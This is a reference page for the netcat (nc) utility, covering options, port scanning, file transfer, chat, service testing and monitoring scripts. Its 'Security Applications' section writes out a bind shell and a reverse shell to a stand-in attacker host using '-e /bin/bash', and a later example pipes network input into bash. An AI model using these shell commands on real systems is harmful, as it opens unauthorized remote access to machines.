nc (netcat)
Overview
The nc (netcat) command is a versatile networking utility that can read and write data across network connections using TCP or UDP protocols. It’s often called the “Swiss Army knife” of networking tools.
Syntax
nc [options] [hostname] [port]
nc -l [options] [port]Common Options
| Option | Description |
|---|---|
-l |
Listen mode |
-p port |
Specify port |
-u |
UDP mode |
-v |
Verbose output |
-n |
Don’t resolve hostnames |
-z |
Zero-I/O mode (port scanning) |
-w timeout |
Connection timeout |
-k |
Keep listening after disconnect |
-4 |
IPv4 only |
-6 |
IPv6 only |
-e program |
Execute program |
-c command |
Execute command |
Key Use Cases
- Port scanning
- Network debugging
- File transfers
- Chat/messaging
- Service testing
- Backdoor creation
- Network troubleshooting
Examples with Explanations
Example 1: Port Scanning
nc -zv google.com 80Tests if port 80 is open on Google
Example 2: Listen on Port
nc -l 8080Listens for connections on port 8080
Example 3: Connect to Service
nc localhost 22Connects to SSH service on localhost
Example 4: File Transfer
# Receiver
nc -l 9999 > received_file.txt
# Sender
nc target_host 9999 < file_to_send.txtPort Scanning
Single port:
nc -zv host 80Port range:
nc -zv host 20-25Multiple ports:
nc -zv host 22 80 443
Network Testing
Test connectivity:
nc -zv -w 3 host portBanner grabbing:
nc host 80 GET / HTTP/1.0Service testing:
echo "QUIT" | nc mail.server.com 25
File Transfer
Send file:
# Receiver nc -l 1234 > received.txt # Sender nc receiver_ip 1234 < file.txtDirectory transfer:
# Receiver nc -l 1234 | tar -xzf - # Sender tar -czf - directory/ | nc receiver_ip 1234
Chat/Messaging
Simple chat:
# Server nc -l 1234 # Client nc server_ip 1234Broadcast chat:
# Server with named pipe mkfifo chat_pipe nc -l 1234 < chat_pipe | tee chat_pipe
Advanced Usage
UDP mode:
nc -u host portKeep listening:
nc -lk 1234Execute commands:
nc -l 1234 -e /bin/bash # Security risk!
Performance Analysis
- Lightweight and fast
- Minimal resource usage
- Good for quick tests
- Efficient for simple transfers
- Low overhead networking
Best Practices
- Use for testing and debugging
- Be cautious with -e option
- Use timeouts for reliability
- Combine with other tools
- Consider security implications
Security Applications
Backdoor (educational):
# Target (dangerous!) nc -l 1234 -e /bin/bash # Attacker nc target_ip 1234Reverse shell:
# Attacker listens nc -l 1234 # Target connects back nc attacker_ip 1234 -e /bin/bash
Network Debugging
Test HTTP:
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80Test SMTP:
printf "EHLO test\r\nQUIT\r\n" | nc mail.server.com 25Test DNS:
nc -u 8.8.8.8 53
Scripting Applications
Port availability check:
#!/bin/bash check_port() { nc -z -w3 "$1" "$2" 2>/dev/null return $? } if check_port google.com 80; then echo "Port 80 is open" fiService monitoring:
while true; do if ! nc -z localhost 80; then echo "Web server down!" # Restart service fi sleep 60 done
File Operations
Backup over network:
# Backup server nc -l 9999 | gzip -d > backup.tar # Source server tar -cf - /data | gzip | nc backup_server 9999Remote command execution:
# Command server nc -l 1234 | bash # Client echo "ls -la" | nc server_ip 1234
Integration Examples
With SSH tunneling:
ssh -L 8080:internal_server:80 gateway_server nc localhost 8080With cron for monitoring:
# Check service every 5 minutes */5 * * * * nc -z localhost 80 || echo "Service down" | mail admin
Troubleshooting
- Connection refused
- Timeout issues
- Firewall blocking
- Permission problems
- Protocol mismatches
Security Considerations
- Never use -e in production
- Firewall implications
- Unencrypted communications
- Potential for abuse
- Monitor usage carefully
Modern Alternatives
For enhanced functionality: 1. socat - More features 2. nmap - Better port scanning 3. ssh - Secure connections 4. curl - HTTP operations 5. openssl s_client - SSL testing
Platform Differences
Different nc implementations: - GNU netcat - OpenBSD netcat - Ncat (Nmap project) - Traditional netcat
Check version:
nc -h 2>&1 | head -1